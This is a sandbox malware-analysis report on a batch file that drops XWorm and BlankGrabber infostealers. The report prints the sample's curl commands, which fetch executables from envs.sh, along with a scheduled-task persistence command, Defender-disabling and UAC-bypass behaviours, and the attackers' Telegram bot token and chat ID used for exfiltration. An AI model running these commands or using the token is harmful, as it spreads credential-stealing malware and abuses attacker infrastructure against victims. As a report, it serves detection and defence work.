File name:

LavaCheker.bat

Full analysis: https://app.any.run/tasks/1f4e2f0a-d5be-46aa-a682-fd70b8141843
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: December 14, 2024, 09:24:30
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
pastebin
xworm
blankgrabber
telegram
python
uac
stealer
screenshot
crypto-regex
ims-api
generic
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with CRLF line terminators
MD5:

66E5393273D93FD4C90B7C4798512557

SHA1:

9746DACA0BA648F5BE80EAA8BB6FB2B047B18E54

SHA256:

6349D455345515BC0466230C7BCE9D035A301C9CFFD411FBEA830F26655564B0

SSDEEP:

24:XXeNuALkcxfKB2kW41QW/bnXj0cLc9/Si2kWM/QWunz5KDlJFfn:Xu5c2f4BjXIum2fMruz5K5jn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Create files in the Startup directory

      • lJJ.exe (PID: 6512)
      • lJL.exe (PID: 6152)
    • XWORM has been detected

      • lJJ.exe (PID: 6512)
    • BlankGrabber has been detected

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
    • Uses Task Scheduler to run other applications

      • lJJ.exe (PID: 6512)
    • Changes the autorun value in the registry

      • lJJ.exe (PID: 6512)
    • Executing a file with an untrusted certificate

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6152)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 3172)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 5568)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 7160)
      • MpCmdRun.exe (PID: 6872)
    • Adds path to the Windows Defender exclusion list

      • lJL.exe (PID: 6152)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 5268)
    • Changes settings for real-time protection

      • powershell.exe (PID: 7092)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 7092)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 7092)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 7092)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 7092)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7092)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7092)
    • Steals credentials from Web Browsers

      • lJL.exe (PID: 6152)
    • Actions looks like stealing of personal data

      • lJL.exe (PID: 6152)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6820)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7212)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 6872)
    • Starts CMD.EXE for self-deleting

      • lJL.exe (PID: 6152)
    • XWORM has been detected (YARA)

      • lJJ.exe (PID: 6512)
    • BLANKGRABBER has been detected (SURICATA)

      • lJL.exe (PID: 6152)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • lJJ.exe (PID: 6512)
    • Executable content was dropped or overwritten

      • curl.exe (PID: 6312)
      • lJJ.exe (PID: 6512)
      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
      • csc.exe (PID: 7200)
    • Checks for external IP

      • svchost.exe (PID: 2192)
      • lJJ.exe (PID: 6512)
      • lJL.exe (PID: 6152)
    • The process creates files with name similar to system file names

      • lJJ.exe (PID: 6512)
    • Reads the date of Windows installation

      • lJJ.exe (PID: 6512)
    • The process drops C-runtime libraries

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
    • Process drops legitimate windows executable

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6224)
    • Starts a Microsoft application from unusual location

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 6224)
      • cmd.exe (PID: 6492)
    • Process drops python dynamic module

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 5252)
      • cmd.exe (PID: 6760)
    • Found strings related to reading or modifying Windows Defender settings

      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6152)
    • Loads Python modules

      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6152)
    • Starts CMD.EXE for commands execution

      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6152)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2160)
      • cmd.exe (PID: 6528)
      • cmd.exe (PID: 3540)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • lJJ.exe (PID: 6512)
      • lJL.exe (PID: 6152)
    • Application launched itself

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
    • Changes default file association

      • reg.exe (PID: 5568)
    • Get information on the list of running processes

      • lJL.exe (PID: 6152)
      • cmd.exe (PID: 5496)
      • cmd.exe (PID: 2928)
      • cmd.exe (PID: 5256)
      • cmd.exe (PID: 3288)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 7160)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 5268)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 7160)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7160)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 640)
      • cmd.exe (PID: 6820)
      • cmd.exe (PID: 7712)
      • cmd.exe (PID: 5268)
      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 2624)
      • cmd.exe (PID: 7404)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 4076)
      • cmd.exe (PID: 2612)
      • cmd.exe (PID: 8060)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 4952)
      • WMIC.exe (PID: 7196)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 6432)
      • WMIC.exe (PID: 6816)
      • WMIC.exe (PID: 3812)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 3060)
      • cmd.exe (PID: 6916)
      • cmd.exe (PID: 7180)
    • Connects to unusual port

      • lJJ.exe (PID: 6512)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 6820)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 6820)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6820)
    • Starts application with an unusual extension

      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6756)
      • cmd.exe (PID: 7804)
      • cmd.exe (PID: 8148)
      • cmd.exe (PID: 7600)
      • cmd.exe (PID: 8060)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 3152)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6524)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 4652)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7212)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7200)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 7452)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 7676)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 7972)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 7844)
    • The process executes via Task Scheduler

      • svchost.exe (PID: 7660)
      • svchost.exe (PID: 7748)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 4984)
    • Found regular expressions for crypto-addresses (YARA)

      • lJJ.exe (PID: 6512)
    • Hides command output

      • cmd.exe (PID: 4984)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • lJJ.exe (PID: 6512)
  • INFO

    • Creates files in the program directory

      • lJJ.exe (PID: 6512)
      • lJL.exe (PID: 6152)
    • Disables trace logs

      • lJJ.exe (PID: 6512)
    • Reads the computer name

      • curl.exe (PID: 7092)
      • curl.exe (PID: 6312)
      • lJJ.exe (PID: 6512)
      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
      • MpCmdRun.exe (PID: 6872)
      • svchost.exe (PID: 7748)
      • svchost.exe (PID: 7660)
    • Reads the machine GUID from the registry

      • lJJ.exe (PID: 6512)
      • csc.exe (PID: 7200)
      • rar.exe (PID: 7452)
      • svchost.exe (PID: 7748)
      • svchost.exe (PID: 7660)
    • Checks supported languages

      • curl.exe (PID: 7092)
      • lJJ.exe (PID: 6512)
      • curl.exe (PID: 6312)
      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
      • tree.com (PID: 7580)
      • tree.com (PID: 7340)
      • tree.com (PID: 7680)
      • tree.com (PID: 8124)
      • tree.com (PID: 7976)
      • csc.exe (PID: 7200)
      • cvtres.exe (PID: 4724)
      • tree.com (PID: 6316)
      • MpCmdRun.exe (PID: 6872)
      • rar.exe (PID: 7452)
      • svchost.exe (PID: 7660)
      • svchost.exe (PID: 7748)
    • Execution of CURL command

      • cmd.exe (PID: 6224)
    • Checks proxy server information

      • lJJ.exe (PID: 6512)
    • Reads Environment values

      • lJJ.exe (PID: 6512)
    • Creates files or folders in the user directory

      • lJJ.exe (PID: 6512)
    • Process checks computer location settings

      • lJJ.exe (PID: 6512)
    • The process uses the downloaded file

      • lJJ.exe (PID: 6512)
      • cmd.exe (PID: 2600)
    • Reads the software policy settings

      • lJJ.exe (PID: 6512)
    • Create files in a temporary directory

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6496)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
      • csc.exe (PID: 7200)
      • cvtres.exe (PID: 4724)
      • rar.exe (PID: 7452)
      • MpCmdRun.exe (PID: 6872)
    • The sample compiled with english language support

      • lJL.exe (PID: 2548)
      • lJL.exe (PID: 6840)
      • lJL.exe (PID: 6152)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 3172)
      • WMIC.exe (PID: 4952)
      • WMIC.exe (PID: 6432)
      • WMIC.exe (PID: 6816)
      • WMIC.exe (PID: 4652)
      • WMIC.exe (PID: 7972)
      • WMIC.exe (PID: 8132)
      • WMIC.exe (PID: 7196)
      • WMIC.exe (PID: 3812)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 2624)
    • Checks the directory tree

      • tree.com (PID: 7580)
      • tree.com (PID: 7680)
      • tree.com (PID: 7340)
      • tree.com (PID: 8124)
      • tree.com (PID: 7976)
      • tree.com (PID: 6316)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7100)
      • powershell.exe (PID: 7092)
      • powershell.exe (PID: 6244)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6244)
      • powershell.exe (PID: 7100)
      • powershell.exe (PID: 7092)
      • powershell.exe (PID: 7792)
      • powershell.exe (PID: 6532)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 7644)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(6512) lJJ.exe
Telegram-Tokens (1)7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Telegram-Info-Links
7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Get info about bothttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getMe
Get incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getUpdates
Get webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : cheker HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Telegram-Responses
oktrue
result
message_id590
from
id7559403648
is_bottrue
first_name[ Meow-Team ]
usernameqwq123qwdaff_bot
chat
id6434827273
first_name>.<
usernamerecafking
typeprivate
date1734168283
text☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : cheker
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
275
Monitored processes
148
Malicious processes
12
Suspicious processes
6

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs curl.exe attrib.exe no specs #XWORM ljj.exe timeout.exe no specs curl.exe svchost.exe schtasks.exe no specs conhost.exe no specs attrib.exe no specs #BLANKGRABBER ljl.exe timeout.exe no specs ljl.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER ljl.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER ljl.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs wmic.exe no specs tasklist.exe no specs powershell.exe no specs systeminfo.exe no specs netsh.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs csc.exe tree.com no specs tiworker.exe no specs cvtres.exe no specs mpcmdrun.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs svchost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs svchost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6224C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\LavaCheker.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6240\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6312curl -o lJJ.exe https://envs.sh/lJJ.exeC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
6484attrib +h lJJ.exeC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
6512lJJ.exe C:\Users\admin\Desktop\lJJ.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\ljj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
ims-api
(PID) Process(6512) lJJ.exe
Telegram-Tokens (1)7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Telegram-Info-Links
7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Get info about bothttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getMe
Get incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getUpdates
Get webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : cheker HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Telegram-Responses
oktrue
result
message_id590
from
id7559403648
is_bottrue
first_name[ Meow-Team ]
usernameqwq123qwdaff_bot
chat
id6434827273
first_name>.<
usernamerecafking
typeprivate
date1734168283
text☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : cheker
6520timeout /t 5 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
7092curl -o lJL.exe https://envs.sh/lJL.exeC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3688"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"C:\Windows\System32\schtasks.exelJJ.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2424\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
62 652
Read events
62 626
Write events
22
Delete events
4

Modification events

(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6512) lJJ.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJJ_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
40
Suspicious files
17
Text files
50
Unknown types
0

Dropped files

PID
Process
Filename
Type
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\base_library.zipcompressed
MD5:A9CBD0455B46C7D14194D1F18CA8719E
SHA256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\libcrypto-3.dllexecutable
MD5:8377FE5949527DD7BE7B827CB1FFD324
SHA256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\rar.exeexecutable
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\_hashlib.pydexecutable
MD5:D6F123C4453230743ADCC06211236BC0
SHA256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\_sqlite3.pydexecutable
MD5:8CD40257514A16060D5D882788855B55
SHA256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\_lzma.pydexecutable
MD5:055EB9D91C42BB228A72BF5B7B77C0C8
SHA256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\_decimal.pydexecutable
MD5:21D27C95493C701DFF0206FF5F03941D
SHA256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\_socket.pydexecutable
MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
SHA256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\_ssl.pydexecutable
MD5:7EF27CD65635DFBA6076771B46C1B99F
SHA256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
2548lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI25482\python313.dllexecutable
MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
SHA256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
46
DNS requests
26
Threats
15

HTTP requests

PID
Process
